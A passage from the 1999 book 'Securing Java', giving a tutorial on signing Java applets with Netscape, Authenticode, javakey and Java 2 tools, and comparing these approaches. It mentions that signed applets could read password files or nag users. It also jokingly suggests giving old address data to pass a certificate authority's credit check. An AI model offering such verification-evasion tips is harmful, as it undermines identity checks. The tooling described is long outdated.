The FirstTry applet doesn't do anything with the privilege it asks for, even if it is granted. However, it would be able to read any file, including the system password file on a Unix system, if it tried. That could be considered an abuse of privilege. Another potentially bad thing this applet could do would be to put the enablePrivilege call inside the paint method. Doing this will cause the browser to continually prompt the user for permission every time paint is called, which will happen until permission is granted, or until the browser is killed. Actually, the Netscape Grant/Deny window has a checkbox that says "Remember this decision." Checking the deny box will make this pop-up never appear again. The take home message is that signed applets can be hostile too. When you enable a privilege, it does not have to stay enabled for the entire execution of the applet. There are a couple of ways to turn privileges off (which is always a good idea). First, when the method that calls enablePrivilege returns, the privilege will automatically be disabled. As a result, you should not use a helper method to enable a privilege, because once execution returns from that method, the privilege will no longer be enabled. Second, you can call revertPrivilege, which also takes the name of a privilege as an argument. Finally, you can call disablePrivilege, which turns off a particular privilege. In no case will the granting of the privilege be revoked; the applet can turn the privilege back on by simply calling enablePrivilege again. To see an example of a signed applet, surf to www.securingjava.com/dpig/netscape.html.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
How to Sign Java Code CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 Previous Page
Section 2 -- Signing Java Applets with Microsoft's Authenticode
Next Page
Next in our tutorial, we'll take on Microsoft's code-signing system for Java. It's a bit peculiar since it does not interact with the JDK 1.1 or Java 2 security models in an intuitive fashion. As usual, step one is securing an identity.
Getting an Authenticode Certificate There are several ways to get a certificate for Microsoft Authenticode. One of the things you can do is generate "test certificates," which allows you to try things out. We'll tell you how to do that in a bit, if you just want to play around. However, if you plan on distributing any code, you're going to want to get a real digital ID. This costs money. A number of vendors distribute certificates, one of them being VeriSign, which we'll use in our examples. To obtain a VeriSign certificate for Authenticode, point Internet Explorer to digitalid.verisign.com/developer/ms_pick.htm. Select a flavor of ID. For personal use, select a Class 2 ID. For business use, select Class 3. You'll be given a form to fill out. Note that the personal Class 2 ID is $20, and you'll have to pay by charge card. Once you submit the form, VeriSign will try to verify you are who you say you are, mainly by running a credit check. Sometimes the credit check won't have up-to-date information, so if you get rejected and you can remember the address for the last place you lived (which is the most common problem), you might want to try it again using old information, pretending you never moved. (Not that we condone this strategy, mind you.) Once your data are approved, VeriSign will send you an email with instructions on picking up the certificate. When downloading your certificate, two files will need to be saved: your private key file, and your certificate file. You should probably save these files to a floppy disk instead of your hard drive, so that someone can't just snag your certificate off your computer (although, without knowing the password you use to protect your private key, snagging the files alone may not do a bad guy much good). Remember the password used to protect the private key; it will be needed when it comes time to sign code. For the sake of simplicity, we'll assume you saved your certificate as a:\Cert.spc and your private key as a:\Key.pvc.
Getting the Signing Software Before signing anything with the new certificates, download and install the Microsoft Java SDK. It's located at www.microsoft.com/msdownload/java/sdk/31f/SDK-JAVA.asp. We'll assume you installed the Java SDK in the directory C:\SDK-Java.31. All of the programs we're going to need for signing Java code live in C:\SDK-Java.31\Bin\PackSign, so you should probably add that directory to your PATH. Under Windows 95/98, running the following command at the DOS prompt will fix up your PATH for the current session: PATH=%PATH%;C:\SDK-Java.31\Bin\PackSign You can add that command to your autoexec.bat file to make the change persist through a reboot.
Cabinet Files Unlike Netscape's Object Signing and Sun's signing tools (which work on JAR files), Authenticode signing will only work on cabinet (CAB) files. There's nothing special about the CAB format; it's just another way of archiving many files into one. However, it's the only archive format IE supports for signing Java code. Say we have an applet that consists of two files: file1.class and file2.class. We can create a CAB file in the same directory by typing the following at the DOS prompt: cabarc N test.cab file1.class file2.class If there are no other class files in the directory, we can also type: cabarc N test.cab *.class
Security Zones In order to understand what we're doing when we sign a CAB file, we need to know a little something about what an IE "security zone" is. By default, a security zone is a group of Web sites. Each zone is assigned a security level, which may be Low, Medium, High, or Custom. We won't cover Custom zones, except to say that they can implement arbitrary security policies. For more on security zones, see Chapter 1, "Mobile Code and Security: Why Java Security Is Important." There's a default zone called Trusted Sites, into which a user can put any server. All code from that zone will be completely trusted (i.e., the zone has a Low security level). Similarly, there's a Restricted Sites zone. Any sites the user puts in this zone will need explicit permission before they can run anything "outside the sandbox." By default, most everything else falls into the Internet zone, which is assigned a Medium security level. Code can run outside the Java sandbox in a very limited manner. For example, code can use up to 1 megabyte of data on your hard drive by using the API com.ms.io.clientstorage, which is included with Microsoft VMs only. (So much for "write once, run anywhere"!) Unlike fully trusted applets, applets restricted to the Medium security level should not otherwise be able to use your file
system. We're going to sign our cabinet file, requesting to run either with Medium or High privileges (we can also request Low privileges, but since we'll always be allowed to run in the sandbox, doing so is mainly useful only to show you vouch for the CAB file). If our code ends up in a Low security zone, our code will always run without prompting the user for permission. If our code ends up in a Medium security zone, then before code that requests Medium level privileges can run, the user will be prompted as to whether to let the code run. If our code ends up in a High security zone, all code that wants to run outside the sandbox will need to be approved through a dialog with the user. See Figure C.2.
Figure C.2 The security warning dialog used by Microsoft Internet Explorer's Authenticode system. This dialog explains who has vouched for the code (by signing it) and what permissions are being requested. Clicking "Always trust content from <user>" is probably a bad idea.
Signing CAB Files To sign test.cab, we're going to use the signcode command, which is included in the Java SDK. Here's a typical command line: signcode -j JavaSign.dll -jp High -spc a:\Cert.spc -v a:\Key.pvk -n "My Applet" -i http://www.mywebpage.com/ test.cab
The flags here are a bit arcane. If you want your CAB file to request permissions, the -j flag should always be there, and take JavaSign.dll as a parameter, unless you're signing something other than Java code (the same command can be used to sign ActiveX controls and other mobile code, too). The -jp flag passes a parameter to the DLL. For Java signing, that's how we request High privileges. The -spc flag and -v flag are used to specify the location of your certificate and private key, respectively. The -n option needs to be present, and it specifies the name of the software, which is displayed to the user before the user decides whether to run your code. The -i option specifies where to go for more information about the product, which also gets displayed when the user is prompted to give your code permission to run. You can also "timestamp" your signature, so that after your certificate expires, your applet will still work. However, doing so requires a timestamp server, which isn't covered here. For more information on Authenticode for Java, visit www.microsoft.com/java/security. To confirm that everything has worked properly so far, run the command: chkjava test.cab A window should appear similar to the one an end user will see when IE asks if the application should be allowed to run.
Making Test Certificates To avoid putting down some cash for a real certificate from a CA and still be able to play around with Authenticode, you can make a test certificate. The first step is to create the certificate with the command: makecert -sk Key.pvk -n "CN=Your Name" Cert.cer That command makes a certificate and a private key you can use in other applications, but it won't work for code signing. To get it to work with code signing, convert it to a Software Publisher Certificate (SPC) by typing: cert2spc Cert.cer Cert.spc When you're finished with that, you can use Key.pvk and Cert.spc for testing purposes in the same way as if they came from a CA.
Special HTML Tag When deploying a signed CAB file in an HTML page, a slight variation on the <APPLET> tag is necessary. As with all applets, the name of the class that extends java.applet.Applet goes in the CODE attribute. However, instead of putting the name of the CAB file in the ARCHIVE attribute as is done with JAR files, CAB files signed with Authenticode are passed using the PARAM tag. As an illustration, the tag to embed into a web page the signed applet "MyApplet" stored in myapp.cab would look like: <APPLET CODE="MyApplet.class">
The named prameter "cabbase" is how Internet Explorer finds the CAB file containing the class specified in the CODE
attribute.
Previous Page
Search the Book Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
How to Sign Java Code CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 Previous Page
Section 3 -- Comparing Authenticode to Netscape Object Signing
Next Page
Microsoft's Authenticode model is somewhat simpler than the Communicator model for the end user. Assuming the user doesn't know anything about zones, lots of stuff runs without asking the user for permission; the user is prompted only to approve code generally when the code requests full access, and doesn't already have permission. Less interaction generally means less hassle for the user. You can make more dialog boxes disappear if you check boxes like, "always trust code from this person," and "always trust code from this site," which appear in the window that announces that code is trying to gain permissions. However, spreading trust around so easily just to avoid dialog boxes can have bad consequences. Authenticode is also simpler for the developer. There's no need for calls to a Capabilities library, meaning you can simply request an access level, as opposed to requesting a set of privileges. However, Netscape is capable of finer-grained access control, which allows the applet to secure only the resources it needs to run without a user feeling the need to give a program complete access to the computer. Another convenience of Authenticode over Object Signing is that the user only gets prompted at most once per applet. Netscape prompts the user whenever new privileges are requested (which is usually during execution). While the Netscape model is more intrusive, it does afford the user a bit more control over what privilege is granted to an applet.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
How to Sign Java Code CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 Previous Page
Section 4 -- Signing Code with Sun's JDK 1.1.x
Next Page
Sun makes its own set of signing tools. The tools have evolved along with the JDK. We'll briefly cover both the JDK 1.1 tools and the Java 2 tools. The JDK ships with a command-line tool called javakey. Its job is to manage a database of entities (people, companies, etc.) and their public/private keys and certificates. It is also supposed to generate and verify signatures for archive files; however, verification is not implemented as of JDK 1.1.7. As Chapter 3 describes, an applet contained within a digitally signed JAR file is allowed to leave the bounds of the Java sandbox under certain circumstances. In JDK 1.1, if a JAR is signed and the user who has browsed to the Web site containing the applet has a policy stating that he or she trusts the person who signed the JAR, the applet can do anything at all that Java code is capable of. For example, it can read and write from the file system, start another process running on the computer (outside of the browser), open a network connection to an arbitrary machine, or myriad other tasks that applets are not normally allowed to do. In other words, trusted signed code under JDK 1.1 is as powerful as Java application code from the JDK 1.0.2 days. Remember, under JDK 1.1, we're operating under a black-and-white security model. To get going with code signing in JDK 1.1, there are few things to gather. On the development side, an applet that tries to perform actions that aren't normally allowed by the Java sandbox is needed (or at least one that can be augmented to attempt such an action). The most rudimentary operation that a signed applet can do that an unsigned applet can't do is read the user.name System property. An example applet follows:
public class UserApplet extends java.applet.Applet { public void init() { String username = "user: "; try { username += System.getProperty("user.name"); } catch (SecurityException se) { username += "cannot read"; } showStatus(username); } }
A signed applet containing the preceding code (running in a browser of a user who trusts the entity that signed the applet) will be able retrieve the name of the user running the applet and display it in the status bar of the browser. Once the applet to be signed and its containing Web page have been created, the class files that contain the applet must be put into a JAR file. Even if the applet in question is only one class, it must be placed inside a JAR file. It is not possible to sign standalone class files. In order to sign Java code with javakey, a signing certificate needs to be created. Once this certificate is created, it can be used to sign the JAR file and distributed to users who wish to allow the signer's applet full access to their system.
Creating a Signing Certificate A file called identitydb.obj stores all certificate information and lives in the directory specified by the Java System Property value user.home. For Unix Java users, this value evaluates to $HOME. For Win32 users, user.home can take a number of values. Different VMs assign the value of user.home either to the USERPROFILE directory, to the HOMEDRIVE\HOMEPATH directory, or when all else fails, to the value of the java.home System Property. To clear up any ambiguity, write and run a simple Java containing the line: System.out.println("user.home= " + System.getProperty("user.home")); Regardless of user.home, the location of identitydb.obj can be set explicitly by adding an identity.database entry to the java.security file that lives in the lib subdirectory of the java installation, wherever that may be on the system.
First, the signer's identity must be created in the database. To create an identity, signername, that will be able to sign objects, run the following command on the command line: javakey cs signername true Now that a signer has been created, that signer's public and private keys must be initialized. Keys can be between 512- and 1024-bits long. To initialize public and private keys for a signer, run the following command (where # is a number between 512 and 1024): javakey gk signername DSA # Higher numbers mean more security. We recommend always using 1024-bit keys. The parameter DSA signifies the algorithm used to generate the keys. The JDK only comes with the DSA algorithm by default. To verify that all has gone well so far, run: javakey ld This command will list all the information in the current identity database. The entry for signername should identify it as a trusted signer as well as noting that the public and private keys have been initialized. The next step generates a certificate that will be valid for signing JAR files. This is different from Netscape Object Signing in that there is no Certificate Authority involved. First, a directives file must be created. The directives file is a Java Properties file that provides values used during certificate generation. Here are the contents of an example directives file: issuer.name=signername subject.name=signername subject.real.name=Sol S. Signer subject.country=US subject.org=Signing Corp subject.org.unit=Development start.date=22 Jul 1998 end.date=16 Aug 1999 serial.number=41
To generate the certificate once the directives file exists, run: javakey gc directivesfile To verify that the certificate was generated properly, run:
javakey ld Look for the signername entry to have the subject.* information from the directives file listed. Everything is now finally set for signing. The command actually used to sign a JAR file also requires a directives file. This is a different directives file than the one used to generate the signing certificate. The first directives file used to generate the certificate will no longer be needed, unless a different certificate needs to be generated. The second kind of directives file is used whenever a JAR gets signed, and should be kept handy. An example directives file for signing a JAR looks like this: signer=signername # look at javakey ld for certificate numbers, should be 1 cert=1 # chain unsupported, must have as value=0 chain=0 # must be 8 characters or less and not conflict with any other # digital signatures that could be inserted into the JAR signature.file=anything out.file=Signed.jar
Once the signingdirective file has been created, run the command: javakey gs signingdirective UnsignedApplet.jar Running this command will generate Signed.jar, which will be a signed version of UnsignedApplet.jar. Putting Signed.jar in the ARCHIVE field of the APPLET tag in an HTML page will cause a Java-enabled browser to bring the JAR file over the network and execute the signed code contained within. For more information on javakey, the official Sun documentation for Solaris can be found at java.sun.com/products/jdk/1.1/docs/tooldocs/solaris/javakey.html. The Win32 specific version can be found at java.sun.com/products/jdk/1.1/docs/tooldocs/win32/javakey.html.
Testing the Signed Applet Now that a signed applet exists, and it is embedded within a Web page, it's ready for testing before release. Testing requires either appletviewer or a Web browser that knows how to validate JARs signed by javakey
and allows signed JARs to leave the sandbox. Unfortunately, neither of the two major browsers (Netscape Communicator and Microsoft Internet Explorer) support javakey-signed JARs. HotJava and the appletviewer program that comes with the JDK can validate JARs signed by javakey. They will allow signed applets out of the sandbox if the signature is valid and the policy states that the user whose signature appears is trusted. Both of these programs search for the identitydb.obj in the same manner that javakey does. The problem is that no one should be surfing the Net with HotJava (too dangerous), and the appletviewer cannot be used to browse the Internet. Since the VMs in Communicator and Internet Explorer do not support javakey signing, in order run javakey-signed applets with those browsers, users must download and install Sun's Java Plug-In.
Java Plug-In for Communicator and Internet Explorer Java Plug-In can be used to run applets instead of the browser's default VM. The Java Plug-In can be configured to use the most recent version of the Java Runtime Environment available from Sun. When an applet is run through the Java Plug-In instead of the browser's default VM, javakey-signed JARs can be verified and can step outside of the sandbox (if policy allows). Users must download the Plug-In from Sun and install it on their system. The download page for the PlugIn is java.sun.com/products/plugin/index.html. Applet developers also need to modify the HTML pages that contain their applets and modify the <APPLET> tag. Applets that are in Web pages using the standard <APPLET> tag will still be run by the browser's default page. The Plug-In will run applets only when it detects a different set of HTML tags that specify an applet. Sun provides an application called HTMLConverter, which can convert pages with the <APPLET> tag into pages containing tags that will launch applets using the Plug-in. The HTMLConverter homepage is java.sun.com/products/plugin/converter.html. Two things to note about using the Plug-In. On Solaris, JavaScript must be enabled for the Plug-In to work properly. With JavaScript disabled, applets did not load or run when we tested the Plug-In with Communicator 4.02 and 4.06. On Win32, the Java Plug-In did not find the identitydb.obj file in the same place that javakey did. This has to do with different versions of the VM setting different values of the user.home Property. If you run into trouble, try moving the identitydb.obj file to a different location. Places to try are mentioned in the section, Creating A Signing Certificate (see page 298).
Distributing Public Keys and Certificates In order for someone to verify who signed a signed JAR, he or she needs the public key of the entity who signed the JAR in the first place. Until the public key is distributed to people other than its owner, no one but the owner can verify that an applet is signed and by whom. Once the signed applet has been tested and has proven to be functional, it can be placed on a Web site for use by others. In order for the applet to escape the sandbox imposed by other people's browsers, users must have the public key or certificate of the entity that signed the applet. Also, the user must tell the identity database that he or she trusts the entity that signed the applet. Trusting the entity that signed the applet allows the applet complete access to the host. Here's how to create a trusted entry: javakey c signername true To import the signer's public key contained in keyfile, run: javakey ik signername keyfile To import the signer's certificate (which contains the signer's public key) from certfile, run: javakey ic signername certfile The identity must be created in the database before trying to import either the public key or certificate. In order to verify the signature on a signed JAR, you need only the public key of the signer. Certificates include the public key. The signer of the applet must make his or her public key (or certificate) available to users of the applet in some way. It could be linked from a Web site, phoned in, or delivered through email. Whichever way it is done, the identity must first be extracted from the identity database. To extract a public key from the database to a file keyfile, use the command: javakey ek signername keyfile To extract signername's certificate number 1 to a file certfile, use the command: javakey ec signername 1 certfile The information in the keyfile or certfile should be given to those who want to create a policy that allows applets signed with the identity to leave the sandbox.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
How to Sign Java Code CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 Previous Page
Section 5 -- Differences Between Netscape Object Signing and JDK 1.1.x javakey
Next Page
There are five major differences between Netscape and Sun's approach to code signing: 1. Netscape Object Signing only works within Communicator. JDK 1.1 signed applets can work in any browser, although Netscape Navigator and Microsoft Internet Explorer both require the installation of the Java Plug-In for the applet to leave the sandbox. 2. Netscape Object Signing requires getting a certificate from a certificate authority such as VeriSign. JDK 1.1 users can generate their own certificates. 3. Netscape Object Signing requires no modifications to HTML tags. If the Plug-In is needed for JDK 1.1 (in case you want to use IE or Netscape), the <APPLET> tag must be changed by HTMLConverter. 4. Netscape Object Signing uses Netscape's own classes to step outside of the sandbox. A Netscapespecific exception is thrown when permission to leave the sandbox is denied. JDK 1.1 javakeysigned applets do not need to include calls to any other non-java.* classes to leave the sandbox, and java.lang.SecurityException is thrown when permission is denied. 5. Netscape Object Signing prompts the user when an applet attempts to leave the sandbox, asking the user for permission to carry out the dangerous act. Actions are grouped, so the user can allow some actions (file reads) but not others (file writes). JDK 1.1 javakey-signed applets that are trusted get complete access to the host.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
How to Sign Java Code CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 Previous Page
Section 6 -- Signing Code with Sun's Java 2
Next Page
The javakey tool from JDK 1.1 has been replaced by two tools in Java 2. One tool manages keys and certificates in a database. The other is responsible for signing and verifying JAR files. Both tools require access to a keystore that contains certificate and key information to operate. The keystore replaces the identitydb.obj from JDK 1.1. New to Java 2 is the notion of policy, which controls what resources applets are granted access to outside of the sandbox (see Chapter 3). The javakey replacement tools are both command-line driven, and neither requires the use of the awkward directive files required in JDK 1.1.x. Management of keystores, and the generation of keys and certificates, is carried out by keytool. jarsigner uses certificates to sign JAR files and to verify the signatures found on signed JAR files.
Getting Started with Keytool The first step in working with Java 2 is getting the latest beta version from Sun. Members of the Java Developers Connection (JDC) can download Early Access releases of Java 2 software. Membership in the JDC is free with registration. Once registered, point your browser to developer.java.sun.com/developer/earlyAccess/jdk12/index.html. The Win32 version of JDK 1.2beta4 comes with the latest version of the Java Plug-In, which supports Java 2. During the Install, answer yes when it wants to know if the JRE and the Plug-In should be installed as well-it will be needed later. The keytool command operates on a keystore file. The name of the keystore file is .keystore by default, and it is located in the directory named by the user.home Java System Property. It is possible to have
multiple keystores. Changing the keystore on which the current keytool command will operate is done through the -keystore <path to keystore> option. Documentation from the Sun Java Web pages states that Java 2 VMs will run and properly authenticate JARs signed with JDK 1.1's keytool. It also states that the last beta release of JDK 1.2 does not yet support 1.1-signed JARs. The keytool utility also supposedly allows porting keys and certificates from 1.1 identitydb.obj files into a Java 2 keystore. According to the documentation, the command to perform the translation is: keytool -identittydb -file <path to identitydb.obj file> Unfortunately, an identitydb.obj file created with JDK 1.1.6 did not successfully import into the keystore when we tested the keytool from JDK 1.2 beta4-we tried on both Win32 and Unix platforms. The error message returned from keytool mentions an InvalidClassError and states that a class used in key management became obsolete, resulting in a serialization error. Until this problem works itself out in later beta and production versions, the certificates and keys used under 1.1 cannot be used in Java 2. New certificates and keys will need to be generated for use with jarsigner and keytool. Generating a public and private key pair and self-signed certificate can be performed from the command line in one shot without the need to create any directives files. All keys and certificates stored in the keystore are accessible through an alias. An alias is a name associated with a certificate entry that keytool uses to uniquely identify each certificate under its control. To generate a certificate keyed by the alias keyname, run the command: keytool -alias keyname -genkey keytool will begin prompting for information. The first prompt is for a keystore password, which will be needed for all further keytool and jarsigner operations on this keystore. It must be at least six characters long and is unfortunately echoed to the screen as it is typed. This means that the keystore password can be leaked to casual observers whenever keytool or jarsigner is used. Once the password has been entered, keytool prompts for some personal information, such as name, company name, city, state, and country. All this information is stored in the generated self-signed certificate, which is saved in the default keystore location. All the personal information is displayed for verification before keytool generates the keys and certificate. After the certificate and keys are generated, keytool prompts for another password. Each certificate has its own password, separate from the keystore password. Entering nothing does not give the key an empty password. It gives the certificate the same password as the keystore. jarsigner will not prompt for the passwords of certificates that have the same password as the keystore, so it may appear that a certificate has no password. However, if the password of the keystore changes, the passwords of the certificates do not change, so jarsigner will start prompting for not only the password of the keystore, but for the certificate as well. The command to change the password of a keystore is:
keytool -storepasswd keytool will prompt for the old password, and the new password twice, all in cleartext. This command does not affect the passwords of certificates in the keystore, including those that happen to have the same password as the keystore. An apparent weakness of the keytool certificate generation system is that a user can accept all the default values for the personal information prompted for before certificate generation. The default value for all the questions is "Unknown." So keytool will generate a valid certificate that can be used to sign JAR files, but is filled with bogus information. No data validation is performed by keytool, so it is possible to, say, create a certificate for Elvis. Certificates generated by the system will be valid for just under one year by default. To change the length of validity for a certificate to n days, add the flag -validity n to the keytool -genkey command. To view the fingerprints of certificates in the keystore, use the command: keytool -list To view the personal information about the issuer and owner of the certificate, run: keytool -list -v
Signing a JAR Once a private key has been generated, jarsigner can be used to mark a JAR file with the public key of the signer. The command to sign a JAR file called SignMe.jar with the keyname private key generated previously is: jarsigner SignMe.jar keyname jarsigner will prompt for the keystore password and the private key password if different than the keystore password before signing the JAR file. To monitor the progress of the signing process, run: jarsigner -verbose SignMe.jar keyname jarsigner can also be used to verify that a JAR has or has not been signed, and by whom. For a simple signed/not signed answer for a JAR file Unknown.jar, run: jarsigner -verify Unknown.jar
To get more information from the verification process, such as the signing status of each file in the JAR file, the personal information from the certificates used to sign each file in the JAR, and whether or not the certificate is known in the default keystore, run: jarsigner -verify -verbose -certs Unknown.jar After each signed file in the listing will be the personal information encoded in the certificate for the entity that signed the file. If that certificate is known in the keystore, the name it is known by will appear in parentheses after the certificate's personal information.
Enter the CA So far, the only changes from JDK 1.1 are the syntax and the names of the commands. Certificates can be generated by keytool with any personal information at all. There is nothing to stop anyone from creating a certificate that claims that it is owned by someone else and signing a JAR with it. What a Certificate Authority can provide is a level of assurance that a certificate truly represents the individual that it claims to represent. That is, of course, if you trust that a Certificate Authority isn't being spoofed, and is properly checking the certificates it vouches for. (Recall, this way madness lies.) Certificates generated by keytool can be exported in a form suitable for submission to a Certificate Authority such as VeriSign. This can be accomplished by running: keytool -certreq -alias keyname -file requestfile That command puts a Certificate Signing Request into requestfile for the certificate know by the keyname alias. However, there is no information as to how to submit this data to a CA for validation. According to the keytool documentation, the CA will validate the certificate and return something that must be imported into the keystore. Although we haven't tested it, the command to import the response from the CA into the keystore is supposed to be: keytool -import -alias newalias -trustcacerts -file response That command imports the response from the CA stored in a file called response into the keystore under the name newalias, which must not already exist in the keystore. The -trustcacerts flag tells keytool to check the response certificate against the five VeriSign certificates that come shipped with Java 2 (at least there were five in JDK 1.2beta4).
Turning Over the Keys Until the certificate used to sign the JAR is made public, no one can grant any permissions to the enclosed applet. To retrieve a copy of the keyname certificate from the keystore into a file mycert, use: keytool -export -alias keyname -file mycert As usual, keytool will prompt for the appropriate passwords. When the command finishes, the file mycert can be distributed to users who wish to grant additional privileges to applets signed by that certificate. As in JDK 1.1, there is currently limited support for a JAR signed with the JDK tools. Again, Sun provides support through the Java Plug-In. Plug-In version 1.1.1 does not necessarily support Java 2. Although the Java Plug-In can be configured to use different VMs installed on the local system, the Plug-In hangs the browser when pointed to a Java 2 VM on Solaris. Documentation for the Win32 version of the Plug-In mentions running a program off the Start menu to configure the Plug-In. The installation script does not create a program group for a Plug-In Control Panel as advertised under Windows NT unless the user performing the installation has permission to create program groups. An Early Access version of Plug-In version Java 2 for Solaris is available to members of the Java Developer's Connection. The latest version of the Plug-In for Win32 ships with JDK 1.2beta4. As with JDK 1.1, any HTML pages that contain Java 2-signed JAR files must be converted using the same HTMLConverter used in JDK 1.1. Converting the HTML ensures that the applet will run in the Plug-In and not in the browser's default VM. See the section on JDK 1.1 JAR signing for information on where to get the HTMLConverter.
Running a Signed Applet The first step upon encountering a signed applet is to locate the certificate of the entity that signed the JAR file and import it into the local keystore. Assuming that the certificate can be located and placed into a file called acert, run: keytool -import -alias analias -file acert An entry in the keystore is created keyed by the name analias for the certificate stored in acert. This is now a trusted entity. Whereas in JDK 1.1, aliases could either be trusted or untrusted, all aliases in Java 2 keystores are trusted. However, in JDK 1.1, trusted aliases could do anything they wanted; aliases in Java 2 cannot do anything unless granted permission. Permissions are granted to aliases through the use of policy files (see Chapter 3).
Creating a Simple Policy for Signed Applets Java 2 introduces the notion of policy. Creating, understanding, and managing security policy for signed mobile code is a difficult and complex problem. Since this discussion is about signing code and not about constructing policy, an extremely simple example of how to construct policy is presented. Creating good policy is beyond the scope of this tutorial. The example policy is strong enough to allow an applet limited file access to the host machine. Java policy files can be created with the new policytool. This application has a GUI to guide users though the many twists and turns encountered when creating policy files. It's a very simplistic GUI with no online help. In its current form as of beta4, it is only useful if one does not know the syntax of a policy file. Policy files are plaintext files that follow a format outlined at java.sun.com/products/jdk/1.2/docs/guide/security/PolicyFiles.html. The default security policy system first reads a system-level policy file from the lib/security/ subdirectory under the Java installation directory. It then tries to read a .java.policy file from the current user's user.home directory. In this file, users specify their personal security policy, which merges with the system security policy. Permissions that can be granted in a Java policy file are outlined at java.sun.com/products/jdk/1.2/docs/guide/security /permissions.html, as well as in Chapter 3. If the policy file is to make reference to a certificate stored in a keystore, a keystore entry must appear in the policy file. The keystore entry specifies the path relative to the policy file itself and the name of the keystore file. To keep things simple and use the default keystore file, add the following line to the .java.policy file in the user.home directory: keystore ".keystore"; To grant an applet permission to write or create any file in the c:\tmp directory, assuming the applet comes from www.friendly.com/~mybuddy/applets/ and is signed by a certificate known in the default keystore as friend, add to the .java.policy file: keystore ".keystore"; grant signedBy "friend", codeBase "http://www.friendly.com/~mybuddy/applets/" { permission java.io.FilePermission "c:\\tmp\\*", "write"; };
Note the double backslashes. All Win32 pathnames must use double backslashes to indicate directories.
Unix pathnames use regular singleton forward slashes. CodeBase follows URL syntax.
Sign Only Privileged Code Applets that request permission to leave the sandbox are usually built for greater purposes than saving a high-score list on the local drive. Applets that do serious business and hence require access to the local system are most likely some of the larger applets in existence. It is unlikely that these applets will be built completely by one developer or one software company. Chances are some of the components of an applet will be bits of utility code found on the Internet or purchased from a tool vendor. A smart organization wants to sign only code that it produces; third-party utility code cannot be safely vouched for. If all the code is signed, then any code can leave the sandbox based on the policy. However, if some code in an applet is from a third party, it should not be signed unless the individual signing the code is willing to vouch that the third-party code won't try to do anything malicious (or introduce a security hole that others can exploit). To say the least, we don't recommend signing code you don't completely understand. Java 2 presents an API for privileged blocks. Privileged blocks are meant to be small sections of code that have a higher privilege than the code that invoked them. JDK 1.2beta4 introduced a new API for privileged blocks. Using this API, the only code that needs to be signed is the code that invokes the AccessController class, and the code that performs the privileged action. All other code can remain unsigned, preventing it from leaving the sandbox on its own (or tempting others to attack it). Documentation on the new API can be found at java.sun.com/products/jdk/1.2/docs/guide/security/doprivileged.html. There are two things to consider when writing signed code that will be integrated with unsigned code. First, make the code in the privileged block as small as possible. The less code that is privileged, the less chance that granting it higher privilege will result in nasty and unwanted side effects. Second, to prevent mix-and-match attacks, all the code for the applet should live in one JAR file, even if the third-party libraries that are used by the applet live in their own JAR. (See Guidelines for Java Developers in Chapter 7, "Java Security Guidelines: Developing and Using Java More Securely.") To sign some portions of a JAR file and leave others unsigned takes a number of steps we'll cover now. First, create a JAR file containing all classes that need to be signed. jar cvf MyApp.jar Signme1.class Signme2.class List all the classes that need to be signed in the previous command. Once the JAR containing classes that need to be signed is created, sign the JAR with jarsigner.
jarsigner MyApp.jar mykey Now, add the remainder of the classes in the application to MyApp.jar. The Java 2 version of jar added the v flag, which allows JAR files to be updated with new files. jar uvf MyApp.jar Other1.class Others.class List the remaining classes in the application in this step. If parts of the application are already in a JAR or ZIP file, they will need to be unarchived before being JARed into the new partially signed JAR file. To verify that all went correctly, use jarsigner to verify the contents. jarsigner -verify -verbose MyApp.jar Only the classes that were added before jarsigner was invoked the first time to create the signature will be marked as signed. All the other classes will be listed, but no certificate or signature will be associated with their listing. If jarsigner fails to verify the entire JAR, or classes that are supposed to be signed appear not to be, use the jar command to list the contents of the JAR. jar tvf MyApp.jar The first entry in the JAR must be META-INF/MANIFEST.MF. If the manifest file is missing or not in the first position in the file, the JAR will not verify properly. Following the MANIFEST.MF file should be a .SF and .DSA (or .RSA) file. If either of those files is missing, then the signature is missing from the JAR. Remove the JAR file and start over. If the commands listed earlier still move the METAINF/MANIFEST.MF file out of the first position in the file, it may not be possible to create a JAR containing signed and unsigned code. (The JAR command with JDK 1.2beta4 did not move the METAINF/MANIFEST.MF file around in the JARs we created.)
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
How to Sign Java Code CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 Previous Page
Section 7 -- Differences between JDK 1.1 Code Signing and Java 2 Code Signing
Next Page
